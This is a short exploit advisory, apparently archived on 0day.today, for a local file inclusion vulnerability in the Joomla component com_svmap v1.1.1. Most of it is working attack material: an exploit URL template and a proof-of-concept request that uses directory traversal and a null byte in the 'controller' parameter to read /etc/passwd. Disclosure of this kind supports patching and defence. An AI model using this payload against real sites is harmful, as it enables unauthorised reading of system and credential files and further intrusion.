id: 11635
date: 04/05/2010
title: Joomla Component com_svmap v1.1.1 LFI Vulnerability
author: Vrs-hCk
cves: 

===================================================
Joomla Component com_svmap v1.1.1 LFI Vulnerability
===================================================

================================================================================================
 
 Title    : Joomla Component com_svmap v1.1.1 LFI Vulnerability
 Vendor   : http://www.la-souris-verte.com
  
 Date     : Monday, 05 April 2010 (Indonesia)
 Author   : Vrs-hCk
 Contact  : ander[at]antisecurity.org
 Blog     : http://c0li.blogspot.com/
 
 ================================================================================================
 
 [+] Exploit
 
     http://[site]/[path]/index.php?option=com_svmap&controller=[LFI]
 
 [+] PoC
 
     http://localhost/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00
 
 ================================================================================================



#  0day.today [2023-03-22]  #